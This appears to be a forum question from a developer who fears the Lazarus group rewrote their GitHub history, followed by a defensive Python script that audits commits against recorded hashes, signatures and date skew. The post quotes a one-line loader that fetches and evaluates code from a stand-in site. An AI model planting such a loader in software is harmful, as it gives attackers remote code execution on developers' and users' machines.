How can I ensure that my Git projects have not been tampered with?
The origin of this whole mess is the news article Beware of Lazarus LinkedIn Recruiting Scam Targeting Org’s To Deliver Malware.
Someone may have breached my system - as in had access to my personal Linux machine for multiple days.
The attackers in question are the Lazarus group, and they are pretty scary - so I'm not taking any chances with them. They have been known to change public Git repos to add and spread malware.
I'm not sure whether they actually did anything, since none of the logs actually show any changes; but still, I remain feeling uneasy - so I nuked everything from my device.
I even bought a new SSD, just in case the firmware of the old one may have been tampered with. I also asked someone with a clean machine to create a new Linux ISO disc image. All that remains are my online accounts (where I've changed all of the passwords and logged out all users), my GitHub account (which the hacker may have infiltrated with a session token or an access token) and a handful of config files, which I vetted individually.
Unfortunately, I recently found out it is possible to send commits to GitHub repos and still make it look like nothing ever happened. For instance, creating a simple bootloader with eval(await fetch("mysneakysite.co")) is all that it takes - that way the malware can very easily reinfect me or anyone that works on or uses my software.
What may have been a perfectly clean commit 3 months ago according to GitHub, may actually have been created yesterday and contain a rootkit (an appalling oversight by GitHub, in my opinion; it should display some sort of warning if the history has been revised)!
So now I'm not sure whether I can ever clone my own GitHub repos again. I'll be forced to check my current project line-by-line (and show each to an AI), just to start working again - but I can't justify that for every project.
So am I forced to abandon my projects, or am I just too paranoid? If I were a hacker, existing Git projects would be a very obvious attack vector - especially since it's apparently trivial to cover your tracks.
I contacted GitHub support and asked for a security log - and they gave me a log going back to January 2nd. I can check this to verify that my repos haven't been messed with. They told me that they can't go back further, so if this type of stuff happens to you, act fast!
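A concrete way to check for the rewritten history the question worries about, as an added example that is not part of the original post: compare the current log against commit hashes recorded out-of-band while the repo was known clean, and look at commit signatures and author/committer date skew. It assumes the manifest was saved somewhere the attacker could not reach (a password manager, a printout) and that the project uses signed commits; the log lines and hashes below are constructed samples.

```python
import subprocess
from dataclasses import dataclass

# Constructed sample of `git log --format='%H|%at|%ct|%G?'` output, newest first.
# %at/%ct are author/committer Unix timestamps; %G? is "G" for a good signature,
# "N" for no signature, "B"/"E" for bad or uncheckable ones.
SAMPLE_LOG = """\
7f3c2a9d1e4b6c8f0a2d4e6f8a0b2c4d6e8f0a1b|1700000000|1712000000|N
5a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d|1699990000|1699990000|G
0123456789abcdef0123456789abcdef01234567|1699980000|1699980000|G
"""

# Hashes recorded out-of-band the last time the repo was known to be clean (constructed).
KNOWN_GOOD = {
    "5a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d",
    "0123456789abcdef0123456789abcdef01234567",
}

@dataclass
class Commit:
    sha: str
    author_ts: int
    committer_ts: int
    sig: str

def parse_log(text):
    """Parse the pipe-separated format above into Commit records."""
    commits = []
    for line in text.splitlines():
        if line.strip():
            sha, at, ct, sig = line.split("|")
            commits.append(Commit(sha, int(at), int(ct), sig))
    return commits

def audit(commits, known_good, max_skew=24 * 3600):
    """Return (sha, reason) findings. Manifest and signature checks are strong;
    date skew is only a hint, since an honest rebase also changes the committer date."""
    findings = []
    for c in commits:
        if c.sha not in known_good:
            findings.append((c.sha, "not in recorded manifest"))
        if c.committer_ts - c.author_ts > max_skew:
            findings.append((c.sha, "committer date far later than author date"))
        if c.sig != "G":
            findings.append((c.sha, f"signature status {c.sig}"))
    for sha in known_good - {c.sha for c in commits}:
        findings.append((sha, "recorded commit no longer in history"))
    return findings

def audit_repo(path, known_good):
    """Run the same audit against a real checkout (hypothetical usage helper)."""
    fmt = "--format=%H|%at|%ct|%G?"
    out = subprocess.run(["git", "-C", path, "log", fmt], capture_output=True, text=True, check=True)
    return audit(parse_log(out.stdout), known_good)
```

The sample's newest commit is unsigned, absent from the manifest and backdated by months, so it is reported three times; the two recorded commits pass cleanly.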